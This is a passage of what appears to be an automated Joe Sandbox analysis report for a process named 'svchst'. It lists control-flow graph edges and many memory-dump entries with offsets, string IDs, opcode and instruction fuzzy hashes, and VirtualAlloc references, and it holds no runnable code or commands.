1148->1145 1176 e8d77e-e8d786 1148->1176 1149->1145 1178 e8d825-e8d82d 1149->1178 1151->1145 1156 e8d9bc-e8d9d3 call e8d590 1181 e8d9dd-e8d9e2 1156->1181 1182 e8d9d5-e8d9db 1156->1182 1157->1145 1158->1145 1183 e8d8d9-e8d8df 1158->1183 1159->1143 1159->1145 1161->1130 1161->1141 1162->1123 1162->1124 1162->1125 1162->1126 1162->1127 1162->1128 1162->1129 1162->1130 1162->1131 1162->1132 1162->1133 1162->1134 1162->1135 1162->1137 1162->1138 1162->1139 1162->1140 1162->1141 1162->1142 1162->1143 1162->1144 1168->1145 1173->1145 1174->1145 1176->1145 1178->1145 1185 e8d9e4-e8d9e5 1181->1185 1186 e8d9e7-e8d9e8 1181->1186 1182->1181 1183->1138 1183->1145 1184->1145 1185->1186 1187->1156 1188->1156 1189->1156 1190->1156 1191->1156 1192->1156 1193->1156 1194->1156 1195->1156 1196->1156 1197->1156
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L
                                        • API String ID: 0-3270656709
                                        • Opcode ID: 445872ff68313a308b7d6d07570205dfe24f8f2ac3f34493b95013f690e76c2c
                                        • Instruction ID: fcd17d67a781f5403e2b3e4d8e66dab5ba1b92625693f41cfb6a0a56bda41535
                                        • Opcode Fuzzy Hash: 445872ff68313a308b7d6d07570205dfe24f8f2ac3f34493b95013f690e76c2c
                                        • Instruction Fuzzy Hash: ECA1BDB490A268CFDB50EFA8C944BDDBBF0AB49314F106096D44EBB295D7749E88DF40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !
                                        • API String ID: 0-2657877971
                                        • Opcode ID: 5270d934eb7b8e269f06e2019269ca06ef61332f13ae207454077a9cdd1f6612
                                        • Instruction ID: 0f573be28a497b1ac6dd146a22846172a82f68e5db9ab930996f5087694b0046
                                        • Opcode Fuzzy Hash: 5270d934eb7b8e269f06e2019269ca06ef61332f13ae207454077a9cdd1f6612
                                        • Instruction Fuzzy Hash: 81A1BEB490A268CFDB50EFA8C944BDCBBF0AB49314F10A095D44EBB291D7749AC8DF40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `
                                        • API String ID: 0-2679148245
                                        • Opcode ID: 138b8b2b3b95ce1ce52f23dad3afb5a102e5abeb9e784f0539fdd535bdf9b38c
                                        • Instruction ID: 27449037e51f0fa96471f035092c357f70b66df28765c19f09c6ff0b71db8e9f
                                        • Opcode Fuzzy Hash: 138b8b2b3b95ce1ce52f23dad3afb5a102e5abeb9e784f0539fdd535bdf9b38c
                                        • Instruction Fuzzy Hash: 2781D374902268CFEB70DB64C988BCEBBB5AF49305F1481D9D04DAB261CB349E85CF55
                                        APIs
                                        • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 05073EBA
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1718029379.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_5070000_svchst.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 3c8526702a71f6e8a447d3ecc3a8ea1168fd2dd5527b26936d9cabe7b5cf5040
                                        • Instruction ID: 33999eb63392007c9ae57cd35640b75a33ae40f19d3556a14145e4217c17ebf1
                                        • Opcode Fuzzy Hash: 3c8526702a71f6e8a447d3ecc3a8ea1168fd2dd5527b26936d9cabe7b5cf5040
                                        • Instruction Fuzzy Hash: 403177B9D05258AFCB10CFA9E884ADEFBF5BB09310F10901AE814B7310D775A945CF68
                                        APIs
                                        • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 05073EBA
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1718029379.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_5070000_svchst.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 3ed5e4672b2884964ec008ed464571054871b8b8875f61da2ffb924885027359
                                        • Instruction ID: b6b51ec1c9dab95f3f9a520e115afa8113d61d67143fc03f4d4a546bfcd8dbef
                                        • Opcode Fuzzy Hash: 3ed5e4672b2884964ec008ed464571054871b8b8875f61da2ffb924885027359
                                        • Instruction Fuzzy Hash: 1E3186B9D052589FCB10CFA9E880ADEFBF5BB09310F20901AE814B7310D375A945CF68
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1720280829.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_5440000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .
                                        • API String ID: 0-248832578
                                        • Opcode ID: c8f5843c3e7c58838f23f4ad817b8dc7cb7a58838516034a04fda9d182aaf8aa
                                        • Instruction ID: 0a904c4981e347797add1ce280fd90995f5b634fc1d3af5e7b381ea702ca0d24
                                        • Opcode Fuzzy Hash: c8f5843c3e7c58838f23f4ad817b8dc7cb7a58838516034a04fda9d182aaf8aa
                                        • Instruction Fuzzy Hash: 5C41907494022ACFDB74DF24D999BA9BBB1BB48300F0044E9D50AA7A91EB705E85DF40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1720280829.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_5440000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Y
                                        • API String ID: 0-3233089245
                                        • Opcode ID: bca17d86157355d2b814d31e00b63eda70dfd69df5517f4a8f3e483192d6935b
                                        • Instruction ID: d92d64f519bc973d918dabaefeeb760ca58f41f54f58566804a8afc6f997a65c
                                        • Opcode Fuzzy Hash: bca17d86157355d2b814d31e00b63eda70dfd69df5517f4a8f3e483192d6935b
                                        • Instruction Fuzzy Hash: F4011334950228CFEB28EF24D9A9BEDB7B2FF45315F4044E9D50A6B290EB315A85DF10
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1720280829.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_5440000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L
                                        • API String ID: 0-3270656709
                                        • Opcode ID: bebae2bbb7cf8ed2796d4f7ab030055adca430dd76b7a12cff4e1bb632c47987
                                        • Instruction ID: 95858ab961b7e66ce58548a1a2893e8694ea72cfcbdb04fd2b00e9927fa47a28
                                        • Opcode Fuzzy Hash: bebae2bbb7cf8ed2796d4f7ab030055adca430dd76b7a12cff4e1bb632c47987
                                        • Instruction Fuzzy Hash: DDF01770E52228CFFB24DB54D949FEAB7B2FB88314F0014E6E509A6285E7744E81DF00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1720280829.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_5440000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L
                                        • API String ID: 0-3270656709
                                        • Opcode ID: a41efcbd0884a0a82e6ac2bd31dc6770faf652eac0016b8de93b5b3ef2485a8b
                                        • Instruction ID: 0f81543901d8d5b2fc63a807ce229db17c95f719f9fb6c1ed10aeb015d5fe3e1
                                        • Opcode Fuzzy Hash: a41efcbd0884a0a82e6ac2bd31dc6770faf652eac0016b8de93b5b3ef2485a8b
                                        • Instruction Fuzzy Hash: BFF09778A01229CFDB24DF24D894AD9BBB2FB49304F1041D5E419A7765DB34AE85CF11
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "
                                        • API String ID: 0-123907689
                                        • Opcode ID: aeb8a95f72fb21016f184a2b3da3c53061bb3a11e846cbc487ab793b38f9f81f
                                        • Instruction ID: 484e3b8d6f2d7b73e0cfb727a8bb91657759537130815736ba99bdb43312bc5a
                                        • Opcode Fuzzy Hash: aeb8a95f72fb21016f184a2b3da3c53061bb3a11e846cbc487ab793b38f9f81f
                                        • Instruction Fuzzy Hash: 14F073B0800228CFCB219FA1DA887D8BBB5BB29305F0064D9D649B2260C7B94AC89F50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Tq
                                        • API String ID: 0-2885792564
                                        • Opcode ID: fd2d5d4062957de1cc5dc8a9c992b6ba2f409e70463cd471323c82bfb299d4e7
                                        • Instruction ID: a231cfc544f20f31c619c6b25cd5f0d0515ae1ff5612b60d10744ba415e59d32
                                        • Opcode Fuzzy Hash: fd2d5d4062957de1cc5dc8a9c992b6ba2f409e70463cd471323c82bfb299d4e7
                                        • Instruction Fuzzy Hash: 43D012B280120CDFCB10DFA1D80869A7BB8EB46311F4005F59409E3260EB315E08E791
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: ae90accc663f89201d6f51bca5e54cf4c3e4d20ca5ee87c876af03ecafca1a27
                                        • Instruction ID: 2dc5eb4c512cdcfa1fca29ae692e18989499c1d91fbcb1ee313ff76a262c7271
                                        • Opcode Fuzzy Hash: ae90accc663f89201d6f51bca5e54cf4c3e4d20ca5ee87c876af03ecafca1a27
                                        • Instruction Fuzzy Hash: 30D0C97090522A8BDB14DB2088487D976F0BB54340F1050E5D04CA7205D3740AC15F40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 550f9d4eb0b0b6b1d08c35502162a377dc0319eba21b78faf9fd8c66b57a37a5
                                        • Instruction ID: 16bc174eb4f3906918589c1fecf2410583dbfebdd84a45027918d663cfe21c8c
                                        • Opcode Fuzzy Hash: 550f9d4eb0b0b6b1d08c35502162a377dc0319eba21b78faf9fd8c66b57a37a5
                                        • Instruction Fuzzy Hash: A2B1BDB490A268CFDB60EFA4C944BDDBBF0AB49314F106095D40EBB295D7749E88DF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 552157f06832c68c6445e6f06533459a458daaeedb3e932c2c7127e87bdaac31
                                        • Instruction ID: deb26e57a44af03ddc5236d4d31605c1e8e8e306e357f6c0846818bbab8c2887
                                        • Opcode Fuzzy Hash: 552157f06832c68c6445e6f06533459a458daaeedb3e932c2c7127e87bdaac31
                                        • Instruction Fuzzy Hash: ECB1ADB490A268CFDB60EFA4C984BD9BBF0AB49314F116095D44EBB291D7749EC8DF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ce2caf1d13f8e9320b9f2dd63ecc25caae8fcf3d1690c3ce9193bdafdd97737
                                        • Instruction ID: 79f2617641586a0c5d9bebd743f070575508b44f04cce3481cd27ce3bca8728c
                                        • Opcode Fuzzy Hash: 2ce2caf1d13f8e9320b9f2dd63ecc25caae8fcf3d1690c3ce9193bdafdd97737
                                        • Instruction Fuzzy Hash: 9FA1BFB490A268CFDB60EFA4C944BD9BBF0AB49314F116095D44EBB291D7749E88DF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3361276cc557da94e19dfe588fb95786d6d8788d1222121c40157703e13528e6
                                        • Instruction ID: d3f588883d084d0ad85855806584396a45435f238805412ca701c40a6615db30
                                        • Opcode Fuzzy Hash: 3361276cc557da94e19dfe588fb95786d6d8788d1222121c40157703e13528e6
                                        • Instruction Fuzzy Hash: 90A1CEB490A268CFDB10EFA4C944BDDBBF0AB49314F11A096D44EBB291D7749AC8DF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b31450f5dfe151ddb51787a292d288975334d259ccf4a27bb4c6b1f0da2af0e
                                        • Instruction ID: c873e7714ec0dd679019aed01aabc1394a7d81cabc2d7341c96a74b5fb9b6d53
                                        • Opcode Fuzzy Hash: 0b31450f5dfe151ddb51787a292d288975334d259ccf4a27bb4c6b1f0da2af0e
                                        • Instruction Fuzzy Hash: 34A1B0B490A258CFCB50EFA4C944BDDBBF0AB49314F11A09AD44EBB295D7749AC8DF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 387e6ab6aad0b60a8dcf2074c2c226f2fc0dc781cf8d445c3e9d830022772be6
                                        • Instruction ID: f542f244485ceb3e3a4cd342ae3e364ea227c4058450283a655a1fa906aed1f2
                                        • Opcode Fuzzy Hash: 387e6ab6aad0b60a8dcf2074c2c226f2fc0dc781cf8d445c3e9d830022772be6
                                        • Instruction Fuzzy Hash: A9A1BEB490A268CFDB50EFA4C984BDDBBF0AB49314F116096D44EBB291D7749AC8DF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9fc4205f4c75b4b3e331099d81926c334c0d91a6476d126403ae737134e17d92
                                        • Instruction ID: 52d2a2a0de75b05baf0116d96290c74194f1ae08566dc099ceb6628acc0e2f8b
                                        • Opcode Fuzzy Hash: 9fc4205f4c75b4b3e331099d81926c334c0d91a6476d126403ae737134e17d92
                                        • Instruction Fuzzy Hash: 22A1CFB490A258CFDB50EFA8C984BDCBBF0AB49314F116096D44EBB295D7749A88DF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0151547042b7d0a9d8040faa0221cea9235f5d617e4e749ffa0e2a6d6936c81
                                        • Instruction ID: c9c5489a528bdded04882e1bb97d2ef5d9b3860949fa9a29ae3a3acf8eadd64e
                                        • Opcode Fuzzy Hash: a0151547042b7d0a9d8040faa0221cea9235f5d617e4e749ffa0e2a6d6936c81
                                        • Instruction Fuzzy Hash: 1BA1CFB490A258CFDB50EFA8C984BDCBBF0AB49324F116095D44EBB295D7749AC8DF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d887a1f308de9eab1bd35fa0669fb42fe75ec3305c51000b83ccb94b5001f88b
                                        • Instruction ID: 041b76a29ffe7f86d3b684fd24e94902871ea56fee068025c26103207ced91c9
                                        • Opcode Fuzzy Hash: d887a1f308de9eab1bd35fa0669fb42fe75ec3305c51000b83ccb94b5001f88b
                                        • Instruction Fuzzy Hash: 1EA1CDB490A268CFCB50EFA8C984BDCBBF0AB49314F106095D44EBB295D7749AC8DF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 882d35c4fb8ab9dfc55a2da1cee5acf6116fb32597a0b14ca886f8aa73329ef9
                                        • Instruction ID: dd70feb4f3004e8c41fb8b720a4b76bb342b042181e7e53e4ad3e57c4e9f8bc4
                                        • Opcode Fuzzy Hash: 882d35c4fb8ab9dfc55a2da1cee5acf6116fb32597a0b14ca886f8aa73329ef9
                                        • Instruction Fuzzy Hash: A3A1CFB490A258CFCB50EFA4C984BDCBBF0AB49314F10A095D44EBB291D7749AC8DF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9438861bf8c7ed32db1b873b1033c1e0c991ea2c2020f5a6ded9dd0574edb54d
                                        • Instruction ID: a18086295023bceb4037932269d2a801df995af4abe71bd708f75d091f3f5ba0
                                        • Opcode Fuzzy Hash: 9438861bf8c7ed32db1b873b1033c1e0c991ea2c2020f5a6ded9dd0574edb54d
                                        • Instruction Fuzzy Hash: 3CA1CEB490A268CFDB50EFA8C944BDCBBF0AB49314F11A095D44EBB291D7749AC8DF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42b4a606ff56a55f131102695a1a7d6607dfb4dd0a5a8503643b387363cecca6
                                        • Instruction ID: 6c4357f3d61d2a95adb25786f0c190fef46b988a4c211df3338bd39c73162b03
                                        • Opcode Fuzzy Hash: 42b4a606ff56a55f131102695a1a7d6607dfb4dd0a5a8503643b387363cecca6
                                        • Instruction Fuzzy Hash: 20A1DFB490A268CFDB10EFA8C944BDDBBF0AB49314F116096D44EBB291D7749AC8DF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1720280829.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_5440000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f2c010398c0b38a74e5ca4509908914bb318be6e1d13a2ddf4da76d83e59e3c0
                                        • Instruction ID: d28455a0e54c3383f9550de3ce1af93c57b24aeb1f76ed394fb6786d1a074305
                                        • Opcode Fuzzy Hash: f2c010398c0b38a74e5ca4509908914bb318be6e1d13a2ddf4da76d83e59e3c0
                                        • Instruction Fuzzy Hash: 1991D170D0526CCFDB14DFA9D848AEEBBB2BF49321F00406AE816AB391D7745A46CF51
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 788c3d99a10fc12caf2ac755c83cb7b79901f478be18a6f9b867ba3a5e6e24f9
                                        • Instruction ID: 7de8ddbd06fc674142520c1b3220b3ef3a7fad48b14d381342927638ffca003d
                                        • Opcode Fuzzy Hash: 788c3d99a10fc12caf2ac755c83cb7b79901f478be18a6f9b867ba3a5e6e24f9
                                        • Instruction Fuzzy Hash: 4691DFB490A258CFCB50EF94C944BDCBBF0AB49314F11A095D44EBB295D7749AC8DF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e8051487d06dd3584584242dcd08fd23cb7b7b0c3063a1ea6ea56634ad6a34e
                                        • Instruction ID: 071fe0e3cb477acba4383ef3679c22bd6c5e86829f15f1f9650b5e3037a05f3f
                                        • Opcode Fuzzy Hash: 8e8051487d06dd3584584242dcd08fd23cb7b7b0c3063a1ea6ea56634ad6a34e
                                        • Instruction Fuzzy Hash: 65A1E474901259CFD720EF68C988A8AFBB5BF45315F1482E6D40CAB262D734DE89CF91
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c23d192ef60fbbc58b1ee3c30472eef1935792e57db71cae11c01bcdab0b5649
                                        • Instruction ID: 047b2402fd0a52357edd5c5239e020bc5789a982e2b744da47a1043f9f839034
                                        • Opcode Fuzzy Hash: c23d192ef60fbbc58b1ee3c30472eef1935792e57db71cae11c01bcdab0b5649
                                        • Instruction Fuzzy Hash: 3991DFB490A258CFCB50EFA8C944BDCBBF0AB49314F116096D44EBB295D7749AC8DF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 249a75a56fe46378de1fe7a116693e53250a04aa31d96001d31cedb0838684fc
                                        • Instruction ID: 4c0c28d583c70a41fd86df1627367135780803c63ed2b4f9b2c6b421b88470b4
                                        • Opcode Fuzzy Hash: 249a75a56fe46378de1fe7a116693e53250a04aa31d96001d31cedb0838684fc
                                        • Instruction Fuzzy Hash: 2C91CFB490A258CFCB50EFA8C984BDDBBF0AB49314F116095D44EBB295D7749AC8DF40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66ccb3170acb1ae373a70473a00165a875fc36444d22aba86707a086a63cd767
                                        • Instruction ID: 680a5ba34b3b67e9841a8ca3f676da1c7f06e102147b3d9f23d7c74e67d3fc88
                                        • Opcode Fuzzy Hash: 66ccb3170acb1ae373a70473a00165a875fc36444d22aba86707a086a63cd767
                                        • Instruction Fuzzy Hash: 1841AD75E00109DFCB44DFA9D9849AEBBF2FF88310B1480A9E919EB320D731AA41CF50
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8edbc0278b5ebb788b80463c1526519e0d9cdd168494f7c13de587e04ab0faa
                                        • Instruction ID: 1d6ac34cc2d0b10e3508934ad4749cd3f9deb2c207584151adabd625099c2735
                                        • Opcode Fuzzy Hash: e8edbc0278b5ebb788b80463c1526519e0d9cdd168494f7c13de587e04ab0faa
                                        • Instruction Fuzzy Hash: 5421F5B4D04209CFDB04DFAAD8487EEBBF2BB88305F20A425D42DB2290D7745A45DF91
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49142c14b43e76fdc04071c0ec56fa03925a5d8bea7f353ef83529f1484f8a7b
                                        • Instruction ID: 8067d17b3ce5bf8e63adf63bca0897de54daae1ec6849213781d5e1c01342ba9
                                        • Opcode Fuzzy Hash: 49142c14b43e76fdc04071c0ec56fa03925a5d8bea7f353ef83529f1484f8a7b
                                        • Instruction Fuzzy Hash: 4521D874D0521DCFDB04DFAAD8486EEBBB5EB88315F10A42AD529B3290D7741A44CFA1
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 41265bfc309b20391aa5eea887bb1ae9e7a7d0bcfe71a018477eb9c34fdca150
                                        • Instruction ID: f337b0afcde6e13952fda5d037b6ceed13f5ce4b913c456c4f8d353ce6cfe715
                                        • Opcode Fuzzy Hash: 41265bfc309b20391aa5eea887bb1ae9e7a7d0bcfe71a018477eb9c34fdca150
                                        • Instruction Fuzzy Hash: AC21D8B5D0521DCFDB04DFAAD8486EEBBB1FB88315F10942AD429B32A0D7741A458FA1
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 650eb426631a8769d1e4855e3abe7bb0df30e68ce65e10e036c9813ab82fea63
                                        • Instruction ID: 80ece31688d53900f20bcd65f591f9a4ecf1dee774a99dbbf7027a303c95c90b
                                        • Opcode Fuzzy Hash: 650eb426631a8769d1e4855e3abe7bb0df30e68ce65e10e036c9813ab82fea63
                                        • Instruction Fuzzy Hash: 70216A70D0820A8FDB04DF9AD8446EEBFF6FF88311F20902AD518B3250E7759985CBA0
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7199af0d14b06f12d5fb835f686c311d56084734e552d3ac2e412f1a6d93cd96
                                        • Instruction ID: 881f2f9469aea9eff87b7c66e5bcaad1b6abbec9aa5f07717a4c5a67b3a8a59d
